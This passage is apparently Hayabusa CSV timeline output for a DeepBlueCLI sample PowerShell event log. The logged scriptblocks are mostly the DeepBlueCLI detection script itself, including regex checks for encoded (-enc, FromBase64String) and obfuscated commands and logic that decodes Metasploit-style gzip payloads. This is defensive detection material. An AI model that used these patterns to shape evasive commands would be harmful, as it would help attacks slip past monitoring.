every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:37.567 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:37.570 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} 
""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:50.476 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:50.476 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:50.477 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:50.477 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:51.309 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:42:14.153 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-PowerShell/Operational"";ID=4104}|fl|more",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:42:19.463 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:42:22.680 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:42:36.639 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:05.016 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" 
powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:05.021 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host 
""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength 
$regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. 
# Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational""",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:05.021 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq 